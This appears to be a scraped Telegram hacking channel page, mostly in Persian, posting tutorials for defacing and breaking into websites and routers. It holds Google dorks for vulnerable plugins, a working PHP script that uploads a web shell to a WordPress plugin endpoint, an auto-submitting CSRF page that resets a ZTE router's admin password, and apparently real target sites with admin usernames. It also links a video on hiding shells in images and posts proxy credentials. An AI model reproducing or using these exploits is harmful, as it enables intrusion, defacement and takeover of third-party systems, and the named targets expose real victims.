0Day.Today | Learn Exploit | Zero World | Dark web |
19.2K subscribers
1.23K photos
127 videos
489 files
1.28K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
نحوه ی هک (دیفیس) سایت توسط باگ Url Posting
#Url_Posting #Bug #Deface
-------------------------------
همان طور که از اسم سایت پیداست شما میتونید با استفاده از این باگ و به وسیله ی URL در سایت تغییراتی ایجاد کنید.
دورک مورد استفاده دراین باگ :

<Start ~ Dorks >

| site:ua "j images jdownloads screenshots version php j"
| site:ua "wp content uploads gravity forms index php option com jdownloads"
| site:ua "plugins editors jce tiny mce plugins cfg contactform"
| site:ua "cfg contactform"

<end ~ Dorks>
~~~~~~~~~~~~~~
POC ~ Exploiting :
just change Url of site ::::

http[s]://Example.me/HACKED-BY-X0P4SH4
:)
#X0P4SH4
t.me/LearnExploit
0Day.Today
#TarGet
~ :
http://www.janinedrayson.co.uk/

#User
~ :
Janinedr

#Pass
~:
Find By self :)

#Bug
~:
Sql
~~~~~~~~~~~~
Have Nice day !
I'm X0P4SH4

there [0Day.Today] Of telegram
ID : @LearnExploit
#WP(Wordpress) #Hacking #Plugin (Peugeot-Music-Plugin) #Exploit
-------------~______~---------

#Dork
~:
inurl:"/wp-content/plugins/peugeot-music-plugin/"

#Vul Url :
~:
"wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php"

#Exploit
~:
<?php
$url = "http://target.com/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php"; // put URL Here

$post = array
(
"file" => "@yourshell.jpg",
"name" => "yourshell.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>
⭕️ For CSRF using php xampp.

#Shell_Locate:
~:
target.com/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/uploads/yourshell.php

========================
#GOODNIGHT
#X0P4SH4

T.me/LearnExploit
0Day.Today
👍1
اموزش نحوه ی #اکسپلویت #روتر های TeDate-ZTE
How to #Exploit #TeDate_ZTE #Rauter's
---> ~# @LearnExploit
---------
title :
( #TeDate_ZTE #Exploiting )

#Url_Patch
~#
/forms/tools_admin_1/

#Exploit
~#
<html>
<body onload="document.alqnas.submit()">

<form action="http://192.168.1.1/Forms/tools_admin_1" method="post" name="alqnas"> //Put Here Ur Rauter IP

<input type="hidden" name="uiViewTools_Password" value="new pass" />

<input type="hidden" name="uiViewTools_PasswordConfirm" value="new pass" />

</form>
</body>
</html>

#Explanations
~#
این باگ از نوع CSRF بوده و در این اکسپلویت درخواست تغییر یوزرنیم و پسورد رو میده
روش اجرا :
موارد زیر رو به نفع خودتون تغییر بدید 😄 :
name="Ur New Username "
value="Ur New Pass"
value="config Ur New Pass"

سپس اکسپلویت رو با پسوند .html سیو کرده
و اجرا کنید :)
روتر یوزر و پسورد جدید رو دریافت کرده :)
================
#X0P4SH4
-->Router Hacking
@LearnExploit ~ 0Day.Today
👍1
اموزش کامل کار با ابزار قدرتمند WPSCAN
#Wpscan (Wordpress Scan) #Learning recorded by #armia_evil
اموزش نحوه ی مخفی کردن شل در پشت عکس برای الپلود به سرور
How To #bind #shell behind the #image (JPG format )
dl Link : http://www.mediafire.com/file/b1jpmzun52y5ccp/Bind%20Shell.mp4
@LearnExploit
#Target :

#site :
~# https://www.nedcc.org

#User admin :
~#`nedccor`

#pass :
~# sorry :) Ur work

=======================
#X0P4SH4
———-> 0Day.tody = @LearnExploit
👍1
#Proxy
#0Day_Today_Learn_Exploit_Zero_World_Dark_web
#Armia_Evil

Server: 159.69.45.12
Port: 4443
Secret: bbf55e7f2529a0814a194a757940de68

Country: 🇩🇪 Germany
City: Gunzenhausen (Frickenfelden)

🆔 @LearnExploit
اموش بعدی کار با ابزار sqlmap👌
هر اموزشی که میخاید پی وی بگید در توانمون باشه میزاریم

Id: @Armia_Evil
#اخطار !
#warning !
طبق تحقیقاتی که کانال امنیتی iranpentester انجام داده هست
بعضی از اکسپلویت هایی که در سایت ثبت اکسپلویت به نام (CXSecurity) الوده و بدافزار میباشند.
برای مثال یکی از اکسپلویت های به لینک :
https://cxsecurity.com/issue/WLB-2012120184
الوده بوده
این اکسپلویت که به زبان پایتون میباشدهنگام اجرا باعث میشود دایرکتوری $HOME شما پاک شود.

دوستان عزیز هنگام استفاده از این نوع اکسپلویت ها دقت داشته باشید.
=======================
#X0P4SH4
@LEARNEXPLOIT
———- > 0Day.Today
اسکریپت اسخراج یوزر های موجود در دایرکتوری
/etc/password/
#Script #python (py) #linux (OS)
@learnexploit
extract users etcpassword.py
692 B
اسکریپت اسخراج یوزر های موجود در دایرکتوری
/etc/password/
#Script #python (py) #linux (OS)
@learnExploit ~ #X0P4SH4
اسکریپت php (ارسال درخواست به سمت سرور)
#PHP #Script (This Script For Your Own Risques )
@LearnExploit
0day.Today